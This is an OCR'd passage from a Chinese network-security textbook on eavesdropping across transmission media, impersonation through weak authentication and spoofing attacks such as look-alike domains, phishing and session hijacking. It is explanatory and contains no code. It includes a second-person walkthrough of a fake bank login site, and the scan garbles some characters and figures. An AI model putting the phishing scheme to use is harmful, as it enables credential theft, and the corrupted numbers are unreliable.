碍 地 获取 正在 传送 的 通信 和 内容。 例如 ,一 名 攻击 者 (或 者 一 名 系统 管理 员 ) 正 在 通过 监视 
流 经 某 个 结 点 的 所 有 流量 进行 偷 听 。 管 理 者 可 能 出 于 一 种 合法 的 目的 ,比如 查看 是 否 有 
员工 不 正确 地 使 用 资源 (例如 ,通过 公司 内 部 网 络 访问 与 工作 不 相干 的 网 站 ) ,或 者 与 不 合 
适 的 对 象 进行 通信 (例如 ,从 一 名 军用 计算 机 向 敌人 传递 一 些 文件 ) 。 

窃听 (Wiretap) 即 通过 一 些 努 力 窃取 通信 信息 。 被 动 窃听 (Passive Wiretapping) 只 
是 “ 听 ”, 与 偷 听 非常 相近 。 而 主动 窃听 (Active Wiretapping) 则 意味 着 还 要 在 通信 信息 中 
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注入 某 些 东西 。 例 如 ,A 可 以 用 他 自己 的 通信 内 容 来 取代 B 的 通信 内 容 , 或 者 以 B 的 名 
义 创建 一 次 通信 。 人 窃听 源 于 电报 和 电话 通信 中 的 偷 听 ,常常 需要 进行 某 种 物理 活动 ,在 这 
种 活动 中 ,使 用 某 种 设备 从 通信 线路 上 获取 信息 。 事 实 上 ,由 于 与 通信 线路 进行 实际 的 接 
触 不 是 必需 的 条 件 , 所 以 有 时 可 以 偷偷 地 实施 窃听 ,以 至 于 通信 的 发 送 者 和 接收 者 都 不 会 
知道 通信 的 内 容 已 经 被 截取 了 。 

窗 听 是 否 成 功 与 通信 媒介 有 关 。 下 面 仔细 研究 一 下 针对 不 同 通信 媒介 的 可 能 攻击 
方法 。 

(1) 电缆 。 对 大 多 数 局 部 网 络 而 言 ,在 一 个 以 太 网 或 者 其 他 LAN 中 ,任何 人 都 可 以 
截取 电缆 中 传送 的 所 有 信和 号。 每 一 个 LAN 连接 器 (比如 计算 机 网 卡 ) 都 有 一 个 唯一 的 地 
址 ,每 一 块 网 卡 及 其 驱动 程序 都 预先 设计 好 了 程序 ,用 它 的 唯一 地 址 (作为 发 送 者 的 “返回 
地 址 ”) 来 标识 它 发 出 的 所 有 数据 包 , 并 只 从 网 络 中 接收 以 其 主机 为 目的 地 址 的 数据 包 。 

但 是 ,仅仅 删除 发 往 某 个 给 定 主机 地 址 的 数据 包 是 不 可 能 的 ,并 且 我 们 也 没有 办 法 阻 
止 一 个 程序 检查 经 过 的 每 一 个 包 。 一 种 称 为 嗅 包 器 (Packet Snifter) 的 软件 可 以 获取 一 
个 LAN 上 的 所 有 数据 包 。 还 有 一 种 方法 ,可 以 对 一 个 网 卡 重新 编程 ,使 它 与 LAN 上 另 
一 块 已 经 存在 的 网 卡 具有 相同 的 地 址 。 这 样 ,这 两 块 不 同 的 网 卡 都 可 以 获取 发 往 该 地 址 
的 数据 包 了 (为 避免 被 其 他 人 察觉 ,这 张 伪 造 的 网 卡 必 须 将 它 所 截取 的 包 复 制 后 发 回 网 
络 )。 就 目前 而 言 ,这 些 LAN 通常 仅仅 用 在 相当 友好 的 环境 中 ,因此 这 种 攻击 很 少 发 生 。 

一 些 高 明 的 攻击 者 利用 了 电线 线 的 特性 ,不 需要 进行 任何 物理 操作 就 可 以 读 取 其 中 
传递 的 数据 包 。 电 缆 线 (以 及 其 他 电子 元 件 ) 会 发 射 无 线 电 波 。 通 过 自 感应 (Inductance) 
过 程 , 入 侵 者 可 以 从 电缆 线 上 读 取 辐射 出 的 信号 ,而 无 须 与 电缆 进行 物理 接触 。 电 缆 信 号 
只 能 传输 一 段 较 短 的 距离 ,而 且 可 能 受 其 他 导电 材料 的 影响 。 由 于 这 种 用 来 获取 信号 的 
设备 并 不 昂贵 而 且 很 容易 得 到 ,因此 对 采用 电缆 作为 传输 介质 的 网 络 应 高 度 重视 自 感应 
威胁 。 为 了 使 攻击 能 起 作用 ,入 侵 者 必须 相当 接近 电缆 ,因此 ,这 种 攻击 形式 只 能 在 有 合 
理 理由 接触 到 电缆 的 环境 中 使 用 。 

如 果 与 电缆 的 距离 不 能 靠 得 足 够 近 ,攻击 者 从 而 无 法 实施 自 感应 技术 时 ,就 可 能 采取 
一 些 更 极端 的 措施 。 窃 听 电 缆 信 号 最 容易 的 形式 是 直接 切断 电缆 。 如 果 这 条 电缆 已 经 投 
入 使 用 ,切断 它 将 会 导致 所 有 服务 都 停止 。 在 进行 修复 的 时 候 , 攻 击 者 可 以 很 容易 地 分 接 
出 另外 一 根 电缆 ,然后 通过 这 根 电缆 就 可 以 获取 在 原来 电缆 线 上 传输 的 所 有 信号 了 。 

网 络 中 传输 的 信号 是 多 路 复 用 (Multiplexed) 的 ,意味 着 在 某 个 特定 的 时 刻 不 止 一 个 
信号 在 传输 。 例 如 ,两 个 模拟 (声音 ) 信 号 可 以 合成 起 来 ,正如 一 种 音乐 和 弦 中 的 两 个 声调 
一 样 ; 同 样 ,两 个 数字 信号 也 可 以 通过 交叉 合成 起 来 ,就 像 玩 扑克 牌 时 洗 牌 一 样 。LAN 传 
输 的 是 截然 不 同 的 包 , 但 是 在 WAN 上 传输 的 数据 却 在 离开 发 送 它们 的 主机 以 后 经 过 了 
复杂 的 多 路 复 用 处 理 。 这 样 , 在 WAN 上 的 窃听 者 不 仅 需 要 截取 自己 想 要 的 通信 信和 号 ,而 
且 需 要 将 这 些 信号 从 同时 经 过 多 路 复 用 处 理 的 信号 中 区 分 开 来 。 只 有 能 够 同时 做 到 这 两 
件 事情 ,这 种 攻击 方式 才 值 得 一 试 。 

(2) 微波 。 微 波 信 号 不 是 沿 着 电线 传输 的 ,而 是 通过 空气 传播 的 ,这 使 得 它们 更 容易 
被 局 外 人 接触 到 。 一 个 传输 者 的 信号 通常 都 是 正 对 着 它 的 接收 者 发 送 的 。 信 号 路 径 必须 
足够 宽 ,才能 确保 接收 者 收 到 信号 。 从 安全 的 角度 来 说 ,信号 路 径 越 宽 , 越 容易 招引 攻击 。 
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一 个 人 不 仅 可 以 在 发 送 者 与 接收 者 连 线 的 中 间 截 取 微 波 信号 ,而 且 可 以 在 与 目标 焦点 有 
稍 许 偏差 的 地 方 , 架 设 一 根 天 线 来 获取 完整 的 传输 信号 。 

微波 信号 通常 都 不 采取 屏蔽 或 者 隔离 措施 以 防止 截取 。 因 此 ,微波 是 一 种 很 不 安全 
的 传输 介质 。 然 而 ,由 于 微波 链 路 中 携带 着 巨大 的 流量 ,因此 ,几乎 不 可 能 (但 不 是 完全 不 
能 够 ) 将 某 一 个 特定 的 通信 信号 从 同时 进行 了 多 路 复 用 处 理 的 其 他 传输 信号 中 分 离 出 来 。 
但 对 于 一 条 专 有 的 微波 链 路 而 言 , 由 于 只 传输 某 一 个 组 织 机 构 的 通信 信息 ,从 而 不 能 很 好 
地 获得 因 容 量 大 而 产生 的 保护 。 

(3) 卫星 通信 。 卫 星 通信 也 存在 着 相似 的 问题 ,因为 发 射 的 信号 散布 在 一 个 比 预 定 
接收 点 广 得 多 的 范围 内 。 尽 管 不 同 的 卫星 具有 不 同 的 特点 ,但 有 一 点 是 相同 的 : 在 一 个 
几 百 英里 宽 上 千 英里 长 的 区 域内 都 可 以 截取 卫星 信号 。 因 此 , 洪 在 被 截取 的 可 能 性 比 微 
波 信号 更 大 。 然 而 ,由 于 卫星 通信 通常 都 经 过 了 复杂 的 多 路 复 用 处 理 , 因 而 被 截取 的 危险 
相对 于 任何 只 传输 一 种 通信 信号 的 介质 要 小 得 多 。 

(4) 光纤 。 光 纤 相 对 于 其 他 通信 介质 而 言 .提供 了 两 种 特有 的 安全 优势 。 第 一 ,在 每 
次 进行 一 个 新 的 连接 时 ,都 必须 对 整个 光纤 网 络 进行 仔细 调整 。 因 此 ,没有 人 能 够 在 不 被 
系统 察觉 的 情况 下 分 接 光纤 系统 。 只 要 剪断 一 束 光 纤 中 的 一 根 就 会 打破 整个 网 络 的 
平衡 。 

第 二 ,光纤 中 传输 的 是 光 能 ,而 不 是 电能 。 电 会 发 射电 磁场 ,而 光 不 会 。 因 此 ,不 可 能 
在 光纤 上 使 用 自 感应 技术 。 

然而 ,就 是 使 用 光纤 也 不 是 绝对 安全 可 靠 的 ,还 需要 使 用 加 密 技术 。 在 通信 线路 中 间 
安放 了 一 些 诸 如 中 继 器 .连接 器 和 分 接 器 等 设备 ,在 这 些 位 置 获取 数据 比 从 光纤 本 身 获取 
数据 要 容易 得 多 。 从 计算 设备 到 光纤 的 连接 处 也 可 能 是 一 些 渗透 点 。 

(5) 无 线 通 信 。 无 线 通信 和 是 通过 无 线 电波 进行 传送 的 。 在 美国 ,无 线 计算 机 连接 与 
车 库 开 门 器 .本 地 无 线 电 (比如 用 于 婴儿 监控 器 ) 一 些 无 强 电 话 以 及 其 他 短 距离 的 应 用 设 
备 共 享 相同 的 频率 。 尽 管 频率 带宽 显得 很 拥挤 ,但 是 对 某 一 个 用 户 而 言 , 很 少 同时 使 用 相 
同 带宽 上 的 多 个 设备 ,因此 ,争夺 带宽 或 干扰 不 构成 问题 。 

但 主要 的 威胁 不 是 干扰 ,而 是 截取 。 无 线 通 信 信 号 的 强度 能 够 达到 大 约 100 一 200 英 
尺 ,可 以 很 容易 地 收 到 强 信号 。 而 且 ,使 用 便宜 的 调谐 天 线 就 可 以 在 几 英 里 外 的 地 方 接收 
到 无 线 信 号 。 换 句 话说 , 某 些 人 如 果 想 要 接收 你 发 出 的 信号 ,可 以 在 几 条 街 的 范围 内 做 这 
件 事情 。 通 过 停 在 路 边 的 一 辆 卡车 或 者 有 笑 货 车 ,拦截 者 就 可 以 在 相当 长 的 一 段 时 间 内 
监视 你 的 通信 ,而 不 会 引起 任何 怀疑 。 在 无 线 通 信 中 ,通常 不 使 用 加 密 技术 ,而 且 在 一 名 
执着 的 攻击 者 面前 , 某 些 无 线 通信 设备 中 内 植 的 加 密 往往 显得 不 是 足够 健壮 。 

无 线 网 络 还 存在 一 个 问题 : 有 骗取 网 络 连接 的 可 能 性 。 很 多 主机 都 运行 了 动态 主机 
配置 协议 (Dynamic Host Configuration Protocol,DHCP) ,通过 该 协议 ,一 名 客户 可 以 从 
一 个 主机 获得 一 个 临时 IP 地 址 和 连接 。 这 些 地 址 原本 放 在 一 个 缓冲 池 中 ,并 随时 可 以 取 
用 。 一 名 新 客户 通过 DHCP 向 主机 请 求 一 个 连接 和 一 个 IP 地 址 ,然后 服务 器 从 缓冲 池 
中 取出 一 个 IP 地 址 ,并 分 配给 请 求 的 主机 。 

这 种 分 配 机 制 在 鉴别 上 存在 一 个 很 大 的 问题 。 除 非 主 机 在 分 配 一 个 连接 之 前 对 用 户 
的 身份 进行 了 鉴别 ,否则 ,任何 进行 请 求 的 客户 都 可 以 分 配 到 一 个 IP 地 址 ,并 以 此 进行 对 
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网 络 的 访问 (通常 分 配 发 生 在 客户 工作 站 上 的 用 户 真 正 到 服务 器 上 进行 身份 确认 之 前 , 因 
此 ,在 分 配 的 时 候 ,DHCP 服务 器 不 可 能 要 求 客户 工作 站 提供 一 个 已 鉴别 的 用 户 身 份 )。 
这 种 状况 非常 严重 ,因为 通过 一 些 城区 的 连接 示意 图 ,就 可 以 找到 很 多 可 用 的 无 线 连接 。 

从 安全 的 观点 来 看 ,应 该 假设 在 网 络 结 点 之 间 所 有 的 通信 链 路 都 有 被 突破 的 可 能 。 
由 于 这 个 原因 ,商业 网 络 用 户 采 取 加 密 的 方法 来 保护 他 们 通信 的 机 密 性 ,尽管 出 于 性 能 的 
考虑 ,商业 网 络 更 倾向 于 采用 加 强 物理 上 和 管理 上 的 安全 来 保护 本 地 连接 ,但 还 是 可 以 对 
局 部 的 网 络 通信 进行 加 密 。 

2) 假冒 

在 很 多 情况 下 ,有 一 种 比 采用 窃听 技术 获取 网 络 信息 更 简单 的 方法 : 假冒 男 一 个 人 
或 者 另外 一 个 进程 。 如 果 你 可 以 直接 获取 相同 的 数据 ,为 何 还 要 冒险 从 一 根 电 缆 线 上 去 
感应 信息 ,或 者 费力 地 从 很 多 通信 中 分 离 出 其 中 的 一 个 通信 呢 ? 

在 广域网 中 采用 假冒 技术 比 在 局 域 网 中 具有 更 大 的 威胁 。 在 局 域 网 中 有 更 好 的 方法 
获取 对 其 他 用 户 的 访问 ,比如 ,他 们 可 以 直接 坐 到 一 台 无 人 注意 的 工作 站 上 ,就 可 以 开始 
工作 了 。 但 是 ,即使 是 在 局 域 网 环境 中 ,假冒 攻击 也 是 不 容 忽视 的 。 因 为 ,局 域 网 有 时 会 
在 未 经 安全 考虑 的 情况 下 就 被 连接 到 一 个 更 大 的 网 络 中 去 。 

在 假冒 攻击 中 ,攻击 者 有 几 种 方式 可 供 选 择 : 

(1) 猜测 目标 的 身份 和 鉴别 细节 。 

(2) 从 一 个 以 前 的 通信 或 者 通过 窃听 技术 获取 目标 的 身份 和 鉴别 细节 。 

(3) 绕 过 目标 计算 机 上 的 鉴别 机 制 或 使 其 失效 。 

(4) 使 用 一 个 不 需要 鉴别 的 目标 。 

(5) 使 用 一 个 采用 众所周知 的 鉴别 方法 的 目标 。 

下 面 来 对 每 一 种 选择 方式 进行 详细 介绍 。 

(1) 通过 猜测 突破 鉴别 。 口 令 猜测 的 来 源 是 很 多 用 户 选择 了 默认 口令 或 容易 被 猜 出 
的 口令 。 在 一 个 值得 信赖 的 环境 中 ,比如 一 个 办 公用 LAN ,口令 可 能 仅仅 是 一 个 象征 性 
的 信号 ,表明 该 用 户 不 想 让 其 他 人 使 用 这 台 工 作 站 或 者 这 个 账户 。 有 时 ,受到 口令 保护 的 
工作 站 上 含有 一 些 敏感 的 数据 ,比如 员工 的 薪水 清单 或 者 关于 一 些 新 产品 的 信息 。 一 些 
用 户 可 能 认为 只 要 有 口令 就 可 以 使 有 好 奇 心 的 同事 知 趣 地 走 开 , 他 们 似乎 没有 理由 防范 
一 心 要 搞 破坏 的 攻击 者 。 然 而 ,一 旦 这 种 值得 信赖 的 环境 连接 到 了 一 个 不 能 信赖 的 较 大 
范围 的 网 络 中 ,所 有 采用 简单 口令 的 用 户 就 会 成 为 很 容易 攻击 的 目标 。 实 际 情况 是 ,一 些 
系统 原本 没有 连接 到 较 大 的 网 络 中 ,因此 它们 的 用 户 开 始 阶段 处 在 一 个 较 少 暴露 的 环境 
中 。 一 旦 进行 了 连接 ,这 种 状况 就 明显 地 改变 了 。 

(2) 以 偷 听 或 者 窃听 突破 鉴别 。 由 于 分 布 式 和 客户 /服务 器 计算 环境 不 断 增 加 ,一 些 
用 户 常 常 对 几 台 联网 的 计算 机 都 有 访问 权限 。 为 了 禁止 任何 外 人 使 用 这 些 访 问 权限 ,就 
要 求 在 主机 之 间 进 行 鉴 别 。 这 些 访 问 可 能 直接 由 用 户 输入 ,也 可 能 通过 主机 对 主机 鉴别 
协议 代表 用 户 自动 做 这 些 事情 。 不 论 是 在 哪 种 情况 下 ,都 要 求 将 账户 和 鉴别 细节 传送 到 
目标 主机 。 当 这 些 内 容 在 网 络 上 传输 时 ,它们 就 暴露 在 网 络 上 任何 一 个 正在 监视 该 通信 
的 人 面前 。 这 些 同样 的 鉴别 细节 可 以 被 一 个 假冒 者 反复 使 用 ,直到 它们 被 改变 为 止 。 

由 于 显 式 地 传输 一 个 口令 是 一 个 明显 的 弱点 ,所 以 开发 出 了 一 些 新 的 协议 ,它们 可 以 
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使 口令 不 离开 用 户 的 工作 站 。 但 是 ,保管 和 使 用 等 细节 是 非常 重要 的 。 


微软 公司 的 LAN Manager 是 一 种 早期 用 于 实现 连 网 的 方法 , 它 采 用 了 一 种 口令 交 
换 机 制 ,使 得 口令 自身 不 会 显 式 地 传输 出 去 ; 当 需 要 传输 口令 时 ,所 传送 的 只 是 一 个 加 密 
的 哈 希 代码 。 口 令 可 以 由 多 达 14 个 字符 组 成 ,其 中 ,可 以 包含 大 小 写字 母 ,数字 或 者 一 些 
特殊 字符 , 则 口令 的 每 个 位 置 有 67 种 可 能 的 选择 ,所 以 ,一 共有 67* 种 可 能 一 一 这 是 一 个 
令 人 生 晨 的 工作 因数 (Work Factor) 。 然 而 ,这 14 个 字符 并 不 是 分 布 在 整个 哈 希 表 中 的 ， 
它们 被 分 成 子 串 分 两 次 发 送出 去 ,分别 代表 字符 1 一 7 和 8 一 14。 如 果 口 令 中 只 有 7 个 或 
者 不 到 7 个 字符 , 则 第 二 个 子 串 全 用 Null 替代 ,从 而 可 以 立即 被 识别 。 一 个 包含 8 个 字 
符 的 口令 ,在 第 二 个 子 串 中 有 1 个 字符 和 6 个 Null, 因 此 ,只 需 进 行 67 次 猜测 就 可 以 找 出 
这 个 字符 。 即 使 在 最 大 情况 下 ,对 一 个 包含 14 个 字符 的 口令 ,工作 因数 从 672 下 降 到 了 
677 十 677 一 2X677 。 这 些 工 作 因数 也 大 约 相当 于 一 个 100 亿 的 不 同 因 数 。LAN Manager 
鉴别 仍 保留 在 很 多 后 来 出 现 的 系统 之 中 (包括 Windows NT) ,只 是 作为 一 种 可 选项 使 用 ， 
以 支持 向 下 兼容 像 Windows 95/98 这 样 的 系统 。 这 个 例子 说 明了 为 什么 安全 和 加 密 都 
是 很 重要 的 ,而 且 必 须 从 设计 和 实现 的 概念 阶段 就 开始 由 专家 对 其 进行 严密 监控 。 

(3) 避 开 鉴别 。 很 显然 ,鉴别 只 有 在 它 运行 的 时 候 才 有 效 。 对 于 一 个 有 弱点 或 者 有 
缺陷 的 鉴别 机 制 来 说 ,任何 系统 或 者 个 人 都 可 以 绕 开 该 鉴别 过 程 而 访问 该 系统 。 

在 一 个 典型 的 操作 系统 缺陷 中 ,用 于 接收 输入 口令 的 缓冲 区 大 小 是 固定 的 ,并 对 所 有 
输入 的 字符 进行 计数 ,包括 用 于 改 错 的 退 格 符 。 如 果 用 于 输入 的 字符 数量 超过 了 缓冲 区 
的 容纳 能 力 ,就 会 出 现 溢出 ,从 而 导致 操作 系统 省 略 对 口令 的 比较 ,并 把 它 当 作 经 过 了 正 
确 鉴 别 的 口令 一 样 对 待 。 这 些 缺 陷 或 者 弱点 可 以 被 任何 寻求 访问 的 人 所 利用 。 

许多 网 络 主机 ,尤其 是 连接 到 广域网 上 的 主机 ,运行 的 操作 系统 很 多 都 是 UNIX 
System V 或 者 BSD UNIX。 在 一 个 局 部 网 络 环境 中 ,很 多 用 户 都 不 知道 正在 使 用 的 是 哪 
一 种 操作 系统 ;当然 也 有 少数 几 个 人 知道 ,或 有 能 力 知道 这 些 信 息 , 另 外 也 有 少数 人 对 利 
用 操作 系统 的 缺陷 很 感 兴趣 。 然 而 ,在 广域网 中 ,一 些 黑客 会 定期 扫描 网 络 ,以 搜寻 正在 
运行 着 有 弱点 或 者 缺陷 的 操作 系统 的 主机 。 因 此 ,连接 到 广域网 (尤其 是 因特网 ) 会 将 这 
些 缺 陷 暴露 给 更 多 企图 利用 它们 的 人 。 

(4) 不 存在 的 鉴别 。 如 果 有 两 台 计 算 机 供 一 些 相 同 的 用 户 存储 数据 和 运行 程序 ,并 
且 每 一 台 计 算 机 在 每 一 个 用 户 第 一 次 访问 时 都 要 对 他 进行 鉴别 ,你 可 能 会 认为 计算 机 对 
计算 机 (Computer-to-Computer) 或 者 本 地 用 户 对 远程 进程 (Local User-to-Remote 
Process) 的 鉴别 是 没有 必要 的 。 这 两 台 计 算 机 及 其 用 户 同 处 于 一 个 值得 信赖 的 环境 中 ， 
重复 鉴别 将 增加 复杂 性 ,这 看 起 来 有 些 多 余 。 

然而 ,这 种 假设 是 不 正确 的 。 为 了 说 明 这 个 问题 ,来 看 看 UNIX 系统 的 处 理 方 法 。 
在 UNIX 系统 中 ,. rhosts 文件 列 出 了 所 有 可 信任 主机 ,. rlogin 文件 列 出 了 所 有 可 信任 用 
户 ,它们 都 被 允许 不 经 鉴别 就 可 以 访问 系统 。 使 用 这 些 文 件 的 目的 是 为 了 支持 已 经 经 过 
他 所 在 域 的 主机 鉴别 过 的 用 户 进行 计算 机 对 计算 机 的 连接 。 这 些 “ 可 信任 主机 ”也 可 以 被 
局 外 人 所 利用 : 他 们 可 以 通过 一 个 鉴别 弱点 (比如 一 个 猜 出 来 的 口令 ) 获 取 对 一 个 系统 的 
访问 ,然后 就 可 以 实现 对 另外 一 个 系统 的 访问 ,只 要 这 个 系统 接受 来 自 其 可 信任 列表 中 的 
真实 用 户 。 
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攻击 者 也 可 能 知道 一 个 系统 有 一 些 身份 不 需要 经 过 鉴别 。 一 些 系统 有 Guest 或 者 
Anonymous 账户 ,以便 允许 其 他 人 可 以 访问 系统 对 所 有 人 发 布 的 信息 。 例 如 ,一 家 银行 
可 能 发 布 目前 的 外 币 汇 率 列表 ,所 有 在 线 目 录 的 图 书馆 可 能 想 把 这 个 目录 提供 给 任何 人 
进行 搜索 ,一 家 公司 可 能 会 允许 任何 人 访问 它 的 一 些 报告 。 一 个 用 户 可 以 用 Guest 登录 
系统 ,并 获取 一 些 公开 的 有 用 信息 。 通 常 ,这 些 系 统 不 会 对 这 些 账号 要 求 口令 ;或 者 向 用 
户 显示 一 条 消息 ,提示 他 们 在 要 求 输入 口令 的 地 方 输入 GUEST( 或 者 你 的 名 字 , 只 需要 
任何 一 个 看 起 来 像 人 名 的 任何 字符 串 都 行 )。 这 些 账户 都 允许 未 经 鉴别 的 用 户 进行 访问 。 

(5) 众所周知 的 鉴别 。 鉴 别 数据 应 该 是 唯一 的 ,而 且 很 难 被 猜 出 来 。 然 而 ,遗憾 的 
是 ,采用 方便 的 鉴别 数据 和 众所周知 的 鉴别 方案 ,有 时 会 使 得 这 种 保护 形同虚设 ,例如 ,一 
家 计算 机 制造 商 计划 使 用 统一 的 口令 ,以 便 它 的 远程 维护 人 员 可 以 访问 遍布 世界 各 地 的 
任何 一 个 客户 的 计算 机 。 幸 运 的 是 ,在 该 计划 付 诸 实施 之 前 ,安全 专家 们 指出 了 其 中 潜在 
的 危险 。 

系统 网 络 管理 协议 (SNMP) 广 泛 应 用 于 网 络 设备 (比如 路 由 器 和 交换 机 ) 的 远程 管 
理 ,不 支持 普通 的 用 户 。SNMP 使 用 了 一 个 公用 字符 串 (Community String) ,这 是 一 个 重 
要 的 口令 ,用 于 公用 设备 彼此 之 间 的 交互 。 然 而 ,网 络 设备 被 设计 成 可 以 进行 带 有 最 小 配 
置 的 快速 安装 ,并 且 很 多 网 络 管理 员 并 不 改变 这 个 安装 在 一 个 路 由 器 或 者 交换 机 中 默认 
的 公用 字符 串 。 这 种 玻 忽 使 得 这 些 在 网 络 周 界 上 的 设备 很 容易 受到 多 种 SNMP 的 攻击 。 

目前 ,一些 销售 商 仍然 喜欢 在 出 售 计算 机 时 附带 安装 一 个 系统 管理 员 账 号 和 默认 口 
令 。 有 些 系统 管理 员 也 忘记 了 改变 他 们 的 口令 或 者 删除 这 些 账号 。 

3) 欺骗 

通过 猜测 或 者 获取 一 个 实体 (有 用户、 账户、 进程 ` 结 点 .设备 等 ) 的 网 络 鉴别 证 书后 , 攻 
击 者 可 以 该 实体 的 身份 进行 一 个 完整 的 通信 。 在 假冒 方式 中 ,攻击 者 扮演 了 一 个 合法 的 
实体 。 与 此 密切 相关 的 是 欺骗 (Spoofing) ,是 指 一 名 攻击 者 在 网 络 的 另 一 端 以 不 真实 的 
身份 与 你 交互 。 欺 骗 方式 包括 伪装 、 会 话 支持 和 中 间 人 攻击 。 

(1) 伪装 。 伪 装 (Masquerade) 是 指 一 台 主 机 假装 成 另 一 台 主 机 。 伪 装 的 常见 例子 是 
混淆 URL。 域 名 很 容易 被 混淆 ,域名 的 类 型 也 很 容易 被 人 们 搞 混 。 比 如 ,xyz. com', xyz. 
org 和 xyz. net 可 能 是 三 个 不 同 的 组 织 机 构 , 也 可 能 只 有 一 个 (假设 xyz. com) 是 某 个 真正 
存在 的 组 织 机 构 的 域名 ,而 其 他 两 个 是 由 某 个 具有 伪装 企图 的 人 注册 的 相似 域名 。 名 称 
中 有 无 连 字 符 (coca-cola. com 对 应 cocacola. com) 以 及 容易 混淆 的 名 称 (10pht. com 对 应 
lopht. com ,或 者 citibank. com 对 应 citybank. com) 也 都 是 实施 伪装 的 候选 名 称 。 

假设 你 想 要 攻击 一 家 真正 的 银行 一 一 芝加哥 First Blue Bank。 该 银行 的 域名 是 Blue 
Bank. com, 因 此 ,你 注册 了 一 个 域名 Blue-Bank. com。 然 后 ,用 Blue-Bank. com 建立 一 个 
网 站 ,还 将 你 从 真正 的 Blue Bank. com 上 下 载 的 首页 作为 这 个 网 站 的 首页 ,并 使 用 真正 的 
Blue Bank 图 标 等 ,以 使 这 个 网 站 看 起 来 尽 可 能 像 First Blue Bank 的 网 站 。 最 后 ,你 邀请 
人 们 使 用 他 们 的 姓名 、 账 号 以 及 口令 或 者 PIN 登录 这 个 网 站 (这 种 访问 重 定向 可 以 采用 
很 多 种 方法 来 完成 。 比 如 ,可 以 在 某 些 有 影响 的 网 站 上 花 钱 申请 一 个 横幅 广告 ,使 它 链接 
到 这 个 站 点 ,而 不 是 真正 的 银行 站 点 ;或 者 你 可 以 发 邮件 给 一 些 芝加哥 居民 ,邀请 他 们 访 
问 这 个 站 点 )。 在 从 几 个 真正 的 银行 用 户 处 收集 了 一 些 个 人 信息 之 后 ,你 可 以 删除 这 个 链 
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接 , 将 这 个 链接 传递 给 真正 的 Blue Bank 银行 ,或 者 继续 收集 更 多 的 信息 。 你 甚至 可 以 不 
留 痕 迹地 将 这 个 链接 转换 成 一 个 真正 的 Blue Bank 的 已 鉴别 访问 ,这 样 ,这 些 用 户 就 永远 
不 会 意识 到 背后 发 生 的 故事 。 

这 种 攻击 的 另 一 种 变化 形式 是 “钓鱼 欺诈 ”(Phishing)。 你 发 送 了 E-mail, 包 含有 真 
实 的 Blue Bank 的 标志 , 诱 使 用 户 点 击 该 链接 ,然后 将 受害 者 带 到 Blue Bank 网 站 。 这 种 
诱 使 方法 想 获得 受害 者 的 账户 ,或 者 你 想 通 过 金钱 奖励 让 受害 者 回答 调查 题 (从 而 需要 账 
号 与 PIN 来 返还 金钱 ) ,或 其 他 好 像 合 法 的 解释 。 这 个 链接 可 能 是 你 的 域 Blue-Bank. 
com，, 该 链接 可 能 写 着 “点 击 这 里 ”可 访问 你 的 账户 (“点 击 这 里 ”链接 到 假冒 的 网 站 ) ,或 者 
你 可 能 针对 URL 使 用 其 他 小 把 戏 来 愚弄 你 的 受害 者 , 如 www. redirect. com/ 
bluebank. com 。 

在 另 一 种 伪装 方法 中 ,攻击 者 利用 了 受害 者 网 页 服务 器 的 一 个 缺陷 ,从 而 可 以 覆盖 受 
害 者 的 主页 。 尽 管 换 掉 某 人 的 主页 会 让 他 在 公众 面前 很 没 面子 ,也 许 还 带 有 一 些 与 该 网 
站 的 目标 相悖 的 不 堪 和 目的 内 容 或 者 极端 的 信息 (比如 ,在 屠宰 场 的 网 站 上 出 现 了 一 些 素 
食 主义 者 的 恳求 ) ,但 绝 大 多 数 人 都 不 会 被 显示 出 来 的 与 该 网 站 的 目标 格格 不 人 的 消息 所 
思 和 弄 。 然 而 ,高 明 的 攻击 者 可 能 要 狭 独 得 多 ,他 们 不 会 将 真正 的 网 站 和 弄 得 面目 全 非 ,而 是 
尽量 模仿 原来 的 站 点 建立 一 个 虚假 的 站 点 ,以便 获 取 一 些 敏感 的 信息 (姓名 ,鉴别 号 、 信 用 
卡号 等 ) ,或 者 诱导 用 户 进行 真正 的 交易 。 例 如 ,如 果 有 一 家 书店 的 网 站 (不 妨 称 之 为 
Books-R-Us) ,被 另 一 家 书店 ( 称 之 为 Books Depot) 巧 妙 地 替换 了 。 那 么 ,那些 天 真 的 用 
户 还 以 为 是 在 跟 Books-R-Us 做 交易 呢 , 殊 不 知 订单 的 处 理 、 填 单 以 及 付 账 等 操作 都 被 
Books Depot 在 背后 接管 了 。“ 钓 鱼 欺诈” 已 成 为 一 个 严重 的 问题 。http://survey. 
mailfrontier. com/survey/quiztest. html 网 站 可 测试 你 从 真正 的 网 站 中 识别 出 “钓鱼 欺 
诈 ” 网 站 的 能 力 。 

(2) 会 话 劫持 。 会 话 劫持 (Session Hijacking) 是 指 截取 并 维持 一 个 由 其 他 实体 开始 
的 会 话 。 假 设 有 两 个 实体 已 经 进入 了 一 个 会 话 , 然 后 第 三 个 实体 截取 了 它们 的 通信 并 以 
其 中 某 一 方 的 名 义 与 男 一 方 进行 会 话 。 仍 以 Books-R-Us 书店 为 例 来 说 明 这 项 技术 。 如 
果 Books Depot 书店 采用 窃听 技术 窃听 了 在 你 和 Books-R-Us 之 间 传 递 的 数据 包 , Books 
Depot 书店 最 初 只 需要 监视 这 些 信 息 流 ,让 Books-R-Us 去 完成 那些 不 容易 做 的 工作 , 比 
如 显示 售 货 清单 以 及 说 服用 户 购 买 等 。 然 后 , 当 用 户 填 完了 订单 ,并 发 出 订购 信息 的 时 
候 ,Books Depot 书店 截取 内 容 是 “我 要 付 账 ” 的 数据 包 , 然 后 与 用 户 进行 接 下 来 的 工作 : 
获取 邮购 地 址 和 信用 卡号 等 。 对 Books-R-Us 书店 而 言 ,这 次 交易 看 起 来 像 是 一 次 没有 
完成 的 交易 : 用 户 仅仅 是 进来 注 了 一 圈 , 但 由 于 某 些 原因 .在 购买 之 前 决定 到 其 他 地 方 再 
去 看 看 。 这 样 ,Books Depot 书店 就 劫持 了 这 次 会 话 。 

另 一 种 与 此 不 同 的 例子 涉及 交互 式 会 话 , 比 如 使 用 Telnet。 如 果 一 名 系统 管理 员 以 
特权 账户 的 身份 进行 远程 登录 ,使 用 会 话 劫持 工具 可 以 介入 该 通信 并 向 系统 发 出 命令 ,就 
好 像 这 些 命令 是 由 系统 管理 员 发 出 的 一 样 。 

(3) 中 间 人 攻击 。 在 会 话 劫持 中 要 求 在 两 个 实体 之 间 进 行 的 会 话 有 第 三 方 介入 ,而 
中 间 人 攻击 (Man-in-the-Middle) 是 一 种 与 此 相似 的 攻击 形式 ,也 要 求 有 一 个 实体 侵入 两 
